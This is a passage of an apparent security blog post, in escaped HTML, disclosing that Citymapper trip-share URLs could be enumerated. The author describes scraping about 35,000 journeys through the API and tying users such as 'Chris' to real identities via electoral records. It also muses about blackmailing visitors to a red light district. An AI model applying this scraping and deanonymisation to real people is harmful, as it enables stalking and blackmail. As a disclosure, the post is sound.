-Tha7v1o
-Tjrdjfp
-Tdgv2zj
-Tjgddh3
-Twdwck3&lt;/p&gt;
&lt;p&gt;Each of the URLs began with a capital ‘T’ and used no uppercase letters after the first character. Mathematically, this reduces the number of possible URL combinations from ~3 x 1012 to ~2 x 109.&lt;/p&gt;
&lt;p&gt;A few tweaks to the Python script and it was possible to harvest over 35,000 valid URLs in just a few hours.&lt;/p&gt;
&lt;p&gt;Whilst it was quite fun to browse to each trip individually, and see what the people of the world were up to, I decided to try and visualise all this data. With our list of valid URLs, it was then possible to use API requests to harvest the information available for each of the 35,000 trips.&lt;/p&gt;
&lt;p&gt;Each API returned (broadly!) followed the following:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;{&amp;#39;status&amp;#39;: &amp;#39;arrived&amp;#39;, &amp;#39;last_updated&amp;#39;: &amp;#39;2016-09-15T10:13:09.126014+00:00&amp;#39;, &amp;#39;region_id&amp;#39;: &amp;#39;uk-london&amp;#39;, &amp;#39;endaddress&amp;#39;: &amp;#39;&amp;#39;, &amp;#39;endname&amp;#39;: &amp;#39;&amp;#39;, &amp;#39;message&amp;#39;: &amp;#39;&amp;#39;, &amp;#39;share_type&amp;#39;: &amp;#39;eta&amp;#39;, &amp;#39;title&amp;#39;: None, &amp;#39;eta&amp;#39;: &amp;#39;2016-09-15T10:13:00+00:00&amp;#39;, &amp;#39;startname&amp;#39;: &amp;#39;&amp;#39;, &amp;#39;signature&amp;#39;: &amp;#39;{&amp;quot;duration&amp;quot;: 544, &amp;quot;end&amp;quot;: {&amp;quot;address&amp;quot;: &amp;quot;Tudor Stacks, 1 Dorchester Dr, Herne Hill, London SE24 0DL, UK&amp;quot;, &amp;quot;coords&amp;quot;: &amp;quot;51.458745,-0.096573&amp;quot;, &amp;quot;id&amp;quot;: &amp;quot;google:ChIJhzq09XYEdkgRnJYjDWZtzsA&amp;quot;, &amp;quot;name&amp;quot;: &amp;quot;Tudor Stacks, 1 Dorchester Dr, Herne Hill, London SE24 0DL, UK&amp;quot;, &amp;quot;source&amp;quot;: &amp;quot;3&amp;quot;}, &amp;quot;kind&amp;quot;: &amp;quot;cycle_personal/fastest&amp;quot;, &amp;quot;legs&amp;quot;: [{&amp;quot;distance&amp;quot;: 1694, &amp;quot;duration&amp;quot;: 544, &amp;quot;ec&amp;quot;: &amp;quot;51.458573,-0.096713&amp;quot;, &amp;quot;mode&amp;quot;: &amp;quot;cycle&amp;quot;, &amp;quot;sc&amp;quot;: &amp;quot;51.468142,-0.095144&amp;quot;}], &amp;quot;region&amp;quot;: &amp;quot;uk-london&amp;quot;, &amp;quot;start&amp;quot;: {&amp;quot;address&amp;quot;: &amp;quot;Bessemer Road&amp;quot;, &amp;quot;coords&amp;quot;: &amp;quot;51.468135,-0.095137&amp;quot;, &amp;quot;source&amp;quot;: &amp;quot;1&amp;quot;}, &amp;quot;time&amp;quot;: &amp;quot;2016-09-15T11:01:44+01:00/NOWISH&amp;quot;, &amp;quot;version&amp;quot;: 2}&amp;#39;, &amp;#39;startaddress&amp;#39;: &amp;#39;&amp;#39;, &amp;#39;coords&amp;#39;: [51.458855, -0.096722]}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;As you can see below it is possible to harvest, en masse, starts and ends to journeys, addresses, methods of transportation and lat/long coordinates.&lt;/p&gt;
&lt;p&gt;Plotting all the lat/long coordinates into generates the following maps. (To any non-GIS aficionados, the easiest way I found to accomplish this was using Google Fusion tables – a tutorial can be found here &lt;a href=&quot;https://support.google.com/fusiontables/answer/2571232&quot;&gt;https://support.google.com/fusiontables/answer/2571232&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;The World:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/ff6ca1ffd22555b046595902f617cfa0/84855/world.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 45.94594594594595%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAJABQDASIAAhEBAxEB/8QAFwABAQEBAAAAAAAAAAAAAAAAAAECBf/EABYBAQEBAAAAAAAAAAAAAAAAAAMAAf/aAAwDAQACEAMQAAAB6aEOstv/xAAXEAADAQAAAAAAAAAAAAAAAAAAESAx/9oACAEBAAEFAmYOP//EABURAQEAAAAAAAAAAAAAAAAAABAR/9oACAEDAQE/Aaf/xAAVEQEBAAAAAAAAAAAAAAAAAAAQEv/aAAgBAgEBPwGT/8QAFBABAAAAAAAAAAAAAAAAAAAAIP/aAAgBAQAGPwJf/8QAGBABAAMBAAAAAAAAAAAAAAAAAQARIEH/2gAIAQEAAT8htCulisf/2gAMAwEAAgADAAAAEEjP/8QAFREBAQAAAAAAAAAAAAAAAAAAACH/2gAIAQMBAT8QhX//xAAXEQEBAQEAAAAAAAAAAAAAAAABACER/9oACAECAQE/EEOQBnL/xAAcEAEAAgIDAQAAAAAAAAAAAAABABEhQRBhcYH/2gAIAQEAAT8QKaHN3cYLkfKgXKnUN+cbZ//Z&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Word&quot;
        title=&quot;Word&quot;
        src=&quot;/static/ff6ca1ffd22555b046595902f617cfa0/1c72d/world.jpg&quot;
        srcset=&quot;/static/ff6ca1ffd22555b046595902f617cfa0/a80bd/world.jpg 148w,
/static/ff6ca1ffd22555b046595902f617cfa0/1c91a/world.jpg 295w,
/static/ff6ca1ffd22555b046595902f617cfa0/1c72d/world.jpg 590w,
/static/ff6ca1ffd22555b046595902f617cfa0/a8a14/world.jpg 885w,
/static/ff6ca1ffd22555b046595902f617cfa0/fbd2c/world.jpg 1180w,
/static/ff6ca1ffd22555b046595902f617cfa0/84855/world.jpg 1678w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;London:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/9efbec31fddcc42db7525c65d4493250/69e09/london.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 87.16216216216216%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAARABQDASIAAhEBAxEB/8QAGAABAQEBAQAAAAAAAAAAAAAAAAECAwX/xAAWAQEBAQAAAAAAAAAAAAAAAAACAAP/2gAMAwEAAhADEAAAAfUz1wYNhIIwV//EABsQAAIDAAMAAAAAAAAAAAAAAAABAgMREBIx/9oACAEBAAEFApz6qu5WLT0SUTR8/wD/xAAUEQEAAAAAAAAAAAAAAAAAAAAg/9oACAEDAQE/AR//xAAWEQADAAAAAAAAAAAAAAAAAAAAEIH/2gAIAQIBAT8BI//EABoQAAICAwAAAAAAAAAAAAAAAAARASEQIDH/2gAIAQEABj8CY4xZRzT/xAAdEAACAQQDAAAAAAAAAAAAAAAAAREgITFRYYGh/9oACAEBAAE/IbQXZNDzA3mw4SMORdYknoho6P8A/9oADAMBAAIAAwAAABAcwEP/xAAYEQADAQEAAAAAAAAAAAAAAAAAAREQYf/aAAgBAwEBPxCqF6PP/8QAGBEBAQADAAAAAAAAAAAAAAAAAQAQIUH/2gAIAQIBAT8QHcEOY//EAB0QAQACAgIDAAAAAAAAAAAAAAEAESExQXFRYbH/2gAIAQEAAT8QR9SrG/cU4d03SGZKPsDwt7oIxNbl3iX1ElAXl5nLuckdz//Z&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;London&quot;
        title=&quot;London&quot;
        src=&quot;/static/9efbec31fddcc42db7525c65d4493250/1c72d/london.jpg&quot;
        srcset=&quot;/static/9efbec31fddcc42db7525c65d4493250/a80bd/london.jpg 148w,
/static/9efbec31fddcc42db7525c65d4493250/1c91a/london.jpg 295w,
/static/9efbec31fddcc42db7525c65d4493250/1c72d/london.jpg 590w,
/static/9efbec31fddcc42db7525c65d4493250/a8a14/london.jpg 885w,
/static/9efbec31fddcc42db7525c65d4493250/69e09/london.jpg 1107w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;However, not all API returns were created equally. Out of the ~35,000 API returns there were: &lt;strong&gt;1,706 usernames, 3,623 locations that were tagged as ‘home’ and 1,009 locations were tagged as ‘work’&lt;/strong&gt;. Combined with some OSINT research we can start to attribute trips to ‘real people’. Take the following API response (anonymised with x’s where appropriate):&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;{
   &amp;quot;status&amp;quot;:&amp;quot;expired&amp;quot;,
   &amp;quot;last_updated&amp;quot;:&amp;quot;2017-04-04T19:33:55+00:00&amp;quot;,
   &amp;quot;region_id&amp;quot;:&amp;quot;uk-london&amp;quot;,
   &amp;quot;endaddress&amp;quot;:&amp;quot;&amp;quot;,
   &amp;quot;endname&amp;quot;:&amp;quot;&amp;quot;,
   &amp;quot;message&amp;quot;:&amp;quot;&amp;quot;,
   &amp;quot;share_type&amp;quot;:&amp;quot;eta&amp;quot;,
   &amp;quot;title&amp;quot;:&amp;quot;None&amp;quot;,
   &amp;quot;eta&amp;quot;:&amp;quot;2017-04-04T20:27:00+00:00&amp;quot;,
   &amp;quot;startname&amp;quot;:&amp;quot;&amp;quot;,
   &amp;quot;signature&amp;quot;:{
      &amp;quot;car&amp;quot;:18701,
      &amp;quot;duration&amp;quot;:3759,
      &amp;quot;end&amp;quot;:{
         &amp;quot;address&amp;quot;:&amp;quot;XXXXX, XXXXX, London E17 XXX, UK&amp;quot;,
         &amp;quot;coords&amp;quot;:&amp;quot;51.5XXXX,-0.0XXXXX&amp;quot;,
         &amp;quot;name&amp;quot;:&amp;quot;Home&amp;quot;,
         &amp;quot;source&amp;quot;:&amp;quot;5&amp;quot;
      },
      &amp;quot;legs&amp;quot;:[
         {
            &amp;quot;distance&amp;quot;:391,
            &amp;quot;duration&amp;quot;:346,
            &amp;quot;ec&amp;quot;:&amp;quot;51.4XXXX,-0.1XXXX&amp;quot;,
            &amp;quot;in_station&amp;quot;:&amp;quot;0/60&amp;quot;,
            &amp;quot;mode&amp;quot;:&amp;quot;walk&amp;quot;,
            &amp;quot;sc&amp;quot;:&amp;quot;51.XXXXX,-0.1XXXXX&amp;quot;
         },
         {
            &amp;quot;end&amp;quot;:&amp;quot;Victoria&amp;quot;,
            &amp;quot;mode&amp;quot;:&amp;quot;transit&amp;quot;,
            &amp;quot;route_ids&amp;quot;:[
            &amp;quot;NationalRailSN&amp;quot;
            ],
            &amp;quot;start&amp;quot;:&amp;quot;BatterseaPark&amp;quot;,
            &amp;quot;stop_count&amp;quot;:2,
            &amp;quot;stop_ids&amp;quot;:[
            &amp;quot;Platform_BatterseaPark_NationalRail&amp;quot;,
            &amp;quot;Platform_Victoria_BGeS&amp;quot;
            ]
         },
         {
            &amp;quot;distance&amp;quot;:0,
            &amp;quot;duration&amp;quot;:330,
            &amp;quot;ec&amp;quot;:&amp;quot;51.4XXXX,-0.1XXXXX&amp;quot;,
            &amp;quot;in_station&amp;quot;:&amp;quot;1/330&amp;quot;,
            &amp;quot;mode&amp;quot;:&amp;quot;walk&amp;quot;,
            &amp;quot;sc&amp;quot;:&amp;quot;51.4XXXXX,-0.1XXXXX&amp;quot;
         },
         {
            &amp;quot;end&amp;quot;:&amp;quot;WalthamstowCentral&amp;quot;,
            &amp;quot;mode&amp;quot;:&amp;quot;transit&amp;quot;,
            &amp;quot;route_ids&amp;quot;:[
            &amp;quot;Victoria&amp;quot;
            ],
            &amp;quot;start&amp;quot;:&amp;quot;Victoria&amp;quot;,
            &amp;quot;stop_count&amp;quot;:12,
            &amp;quot;stop_ids&amp;quot;:[
            &amp;quot;Platform_Victoria_V_dN&amp;quot;,
            &amp;quot;Platform_WalthamstowCentral_Underground&amp;quot;
            ]
         },
         {
            &amp;quot;distance&amp;quot;:1349,
            &amp;quot;duration&amp;quot;:1205,
            &amp;quot;ec&amp;quot;:&amp;quot;51.5XXXXX,-0.0XXXXX&amp;quot;,
            &amp;quot;from_exit&amp;quot;:&amp;quot;WalthamstowCentral_E2903&amp;quot;,
            &amp;quot;in_station&amp;quot;:&amp;quot;2/120&amp;quot;,
            &amp;quot;mode&amp;quot;:&amp;quot;walk&amp;quot;,
            &amp;quot;sc&amp;quot;:&amp;quot;51.5XXXX,-0.0XXXXX4&amp;quot;
         }
      ],
      &amp;quot;price_pence&amp;quot;:390,
      &amp;quot;region&amp;quot;:&amp;quot;uk-london&amp;quot;,
      &amp;quot;routing_request_id&amp;quot;:&amp;quot;02ffc71d-daa5-4828-bea3-a31adf3c3c6e&amp;quot;,
      &amp;quot;start&amp;quot;:{
         &amp;quot;coords&amp;quot;:&amp;quot;51.4XXXXX,-0.1XXXX&amp;quot;,
         &amp;quot;source&amp;quot;:&amp;quot;1&amp;quot;
      },
      &amp;quot;time&amp;quot;:&amp;quot;2017-04-04T20:29:04+01:00/NOWISH&amp;quot;,
      &amp;quot;version&amp;quot;:2
   },
   &amp;quot;startaddress&amp;quot;:&amp;quot;&amp;quot;,
   &amp;quot;coords&amp;quot;:[
     51.4XXXX,
     -0.1XXXX
   ],
   &amp;quot;user_name&amp;quot;:&amp;quot;Chris&amp;quot;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;As you can see, on 04 Apr 2017, Chris took a journey at 19:33 from Battersea to his home address in E17. He walked to Victoria station before taking the Victoria line to Walthamstow.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/fc71083eff08a284bfccc60cd32be03f/10fd8/route.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 90.54054054054053%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAASABQDASIAAhEBAxEB/8QAGAABAAMBAAAAAAAAAAAAAAAAAAECBQP/xAAVAQEBAAAAAAAAAAAAAAAAAAAAAf/aAAwDAQACEAMQAAAB2aTaTm6DK1RZB//EABsQAQACAgMAAAAAAAAAAAAAAAEAAgMQESRB/9oACAEBAAEFAoilBrX2czOdrX//xAAUEQEAAAAAAAAAAAAAAAAAAAAg/9oACAEDAQE/AR//xAAWEQADAAAAAAAAAAAAAAAAAAAAEBH/2gAIAQIBAT8BI//EAB0QAAAFBQAAAAAAAAAAAAAAAAABAgMREBIgIVH/2gAIAQEABj8CGjgQpV59wbr/AP/EABwQAAICAgMAAAAAAAAAAAAAAAERACEQMUFRsf/aAAgBAQABPyGG9siimo+LsBQmge8hF4HHuBqf/9oADAMBAAIAAwAAABAv/wCC/8QAFhEAAwAAAAAAAAAAAAAAAAAAABAR/9oACAEDAQE/ECv/xAAXEQEBAQEAAAAAAAAAAAAAAAAAAREx/9oACAECAQE/EJxpEf/EABoQAQADAQEBAAAAAAAAAAAAAAEAESFBUWH/2gAIAQEAAT8QWhUqthTZABT47NkwtV15RDs0OLBYvKagOxrUmFPuAeGzAn//2Q==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Route&quot;
        title=&quot;Route&quot;
        src=&quot;/static/fc71083eff08a284bfccc60cd32be03f/1c72d/route.jpg&quot;
        srcset=&quot;/static/fc71083eff08a284bfccc60cd32be03f/a80bd/route.jpg 148w,
/static/fc71083eff08a284bfccc60cd32be03f/1c91a/route.jpg 295w,
/static/fc71083eff08a284bfccc60cd32be03f/1c72d/route.jpg 590w,
/static/fc71083eff08a284bfccc60cd32be03f/a8a14/route.jpg 885w,
/static/fc71083eff08a284bfccc60cd32be03f/10fd8/route.jpg 942w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;With a bit of help from electoral records and social media we can attribute Chris to an actual human being… with actual friends and an actual job.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/7c11fbc01024aa0f77e7c05672b711d2/7c09c/records.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 83.78378378378379%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAARABQDASIAAhEBAxEB/8QAFwABAQEBAAAAAAAAAAAAAAAAAAMCBP/EABYBAQEBAAAAAAAAAAAAAAAAAAECAP/aAAwDAQACEAMQAAAB6625ai6o18BWxn//xAAbEAADAAIDAAAAAAAAAAAAAAABAgMAEBMUIv/aAAgBAQABBQJXQEXQZ2ExpIBP2/DPQ1//xAAWEQEBAQAAAAAAAAAAAAAAAAAiABD/2gAIAQMBAT8BUt//xAAWEQEBAQAAAAAAAAAAAAAAAAAhABD/2gAIAQIBAT8BI3//xAAeEAACAQMFAAAAAAAAAAAAAAAAARECMWEDICIyUf/aAAgBAQAGPwJvm5yWqLMlUTgirRaXsnXZ/8QAHhAAAQMEAwAAAAAAAAAAAAAAAQARcRAxQVFhkfD/2gAIAQEAAT8hL4m2shAm7CgBZa5jA3XAZDBaWXgaZzT/2gAMAwEAAgADAAAAEMjv/P/EABgRAAMBAQAAAAAAAAAAAAAAAAERUQAQ/9oACAEDAQE/EFYysd//xAAYEQACAwAAAAAAAAAAAAAAAAAAEQEQQf/aAAgBAgEBPxB5gd//xAAfEAEAAgEDBQAAAAAAAAAAAAABABEhEFGRMWGBwdH/2gAIAQEAAT8QVwrtHYXiIQot9R5WAUeQH3EcCsSK2y1ApeHBkLE7Tl91xP/Z&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Records&quot;
        title=&quot;Records&quot;
        src=&quot;/static/7c11fbc01024aa0f77e7c05672b711d2/1c72d/records.jpg&quot;
        srcset=&quot;/static/7c11fbc01024aa0f77e7c05672b711d2/a80bd/records.jpg 148w,
/static/7c11fbc01024aa0f77e7c05672b711d2/1c91a/records.jpg 295w,
/static/7c11fbc01024aa0f77e7c05672b711d2/1c72d/records.jpg 590w,
/static/7c11fbc01024aa0f77e7c05672b711d2/a8a14/records.jpg 885w,
/static/7c11fbc01024aa0f77e7c05672b711d2/7c09c/records.jpg 975w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Arguably this journey in isolation isn’t very useful to anybody, malicious or otherwise. If I ran my Python script for a month however, there would probably be enough data to start building a pattern of life for Chris (depending on how often he uses the application). This is especially pertinent as some of the journeys that I harvested were dated from over 2 years ago. However, I couldn’t confirm whether every journey ever made on Citymapper was available with such a small dataset.&lt;/p&gt;
&lt;p&gt;What is interesting though is that if you take an ‘end location’ and work backwards you can see which individuals have been to certain locations.&lt;/p&gt;
&lt;p&gt;In my dataset there were 5 instances of journeys planned to visit the Eiffel Tower in Paris; the 5 people had made their way there from shopping, bars, or hotels. Not surprising.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/4f5936eafd1898d6d76f8ff073a04256/2bfdb/paris.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 71.62162162162163%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAOABQDASIAAhEBAxEB/8QAFwAAAwEAAAAAAAAAAAAAAAAAAAIDBf/EABYBAQEBAAAAAAAAAAAAAAAAAAEAAv/aAAwDAQACEAMQAAAB1aiAxIzf/8QAFhABAQEAAAAAAAAAAAAAAAAAARAg/9oACAEBAAEFAgwz/8QAFBEBAAAAAAAAAAAAAAAAAAAAEP/aAAgBAwEBPwE//8QAFhEBAQEAAAAAAAAAAAAAAAAAAAES/9oACAECAQE/AbWn/8QAFhAAAwAAAAAAAAAAAAAAAAAAEBEg/9oACAEBAAY/AoQ//8QAGhAAAgIDAAAAAAAAAAAAAAAAASEAEBFBUf/aAAgBAQABPyHcYUg6HIWA1f/aAAwDAQACAAMAAAAQk9//xAAWEQEBAQAAAAAAAAAAAAAAAAABABH/2gAIAQMBAT8QDC2//8QAGBEAAgMAAAAAAAAAAAAAAAAAAAERIXH/2gAIAQIBAT8QntmD/8QAHRABAAMAAQUAAAAAAAAAAAAAAQARIUExUWFxsf/aAAgBAQABPxBF6vLfHmNRQMUHfcs2kiEoZ9iUE91iT//Z&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Paris&quot;
        title=&quot;Paris&quot;
        src=&quot;/static/4f5936eafd1898d6d76f8ff073a04256/1c72d/paris.jpg&quot;
        srcset=&quot;/static/4f5936eafd1898d6d76f8ff073a04256/a80bd/paris.jpg 148w,
/static/4f5936eafd1898d6d76f8ff073a04256/1c91a/paris.jpg 295w,
/static/4f5936eafd1898d6d76f8ff073a04256/1c72d/paris.jpg 590w,
/static/4f5936eafd1898d6d76f8ff073a04256/a8a14/paris.jpg 885w,
/static/4f5936eafd1898d6d76f8ff073a04256/2bfdb/paris.jpg 1147w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;But what if we look at somewhere less reputable; such as Amsterdam’s red light district;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/814be75fc38bd7677b79a98ded36a698/14cbd/amsterdam.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 91.8918918918919%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAASABQDASIAAhEBAxEB/8QAFwABAQEBAAAAAAAAAAAAAAAAAAECBf/EABYBAQEBAAAAAAAAAAAAAAAAAAIAAf/aAAwDAQACEAMQAAAB68srLZHNDuAb/8QAGBAAAgMAAAAAAAAAAAAAAAAAAAEQESD/2gAIAQEAAQUCzUIZ/8QAFBEBAAAAAAAAAAAAAAAAAAAAIP/aAAgBAwEBPwEf/8QAFREBAQAAAAAAAAAAAAAAAAAAEEH/2gAIAQIBAT8BIf/EABQQAQAAAAAAAAAAAAAAAAAAADD/2gAIAQEABj8CH//EABwQAAEEAwEAAAAAAAAAAAAAAAAQMUFhAREhgf/aAAgBAQABPyEmzk4Ry2vVuP/aAAwDAQACAAMAAAAQUxD/AP/EABkRAAIDAQAAAAAAAAAAAAAAAAABEBExQf/aAAgBAwEBPxDhTHsf/8QAFxEAAwEAAAAAAAAAAAAAAAAAAAExEf/aAAgBAgEBPxBU1CodP//EABsQAAICAwEAAAAAAAAAAAAAAAEhABExQVGB/9oACAEBAAE/EMbjsQTbmJYpm1EavIiJCzAB6ejAy+CEW4Z31P/Z&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Amsterdam&quot;
        title=&quot;Amsterdam&quot;
        src=&quot;/static/814be75fc38bd7677b79a98ded36a698/1c72d/amsterdam.jpg&quot;
        srcset=&quot;/static/814be75fc38bd7677b79a98ded36a698/a80bd/amsterdam.jpg 148w,
/static/814be75fc38bd7677b79a98ded36a698/1c91a/amsterdam.jpg 295w,
/static/814be75fc38bd7677b79a98ded36a698/1c72d/amsterdam.jpg 590w,
/static/814be75fc38bd7677b79a98ded36a698/a8a14/amsterdam.jpg 885w,
/static/814be75fc38bd7677b79a98ded36a698/14cbd/amsterdam.jpg 901w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;We can see that a handful of people may be unaware that their trips are publicly available. If we used OSINT to research these trips and people, might we find a happily married man to blackmail?&lt;/p&gt;
&lt;p&gt;Would Oscar’s employers be happy to know that he was taking a trip home at 04:03 on a Wednesday morning?&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/63be53083c7cfc0e4fd11ed67245ba55/ef245/oscar.jpg&quot;
    style=&quot;display: block&quot;
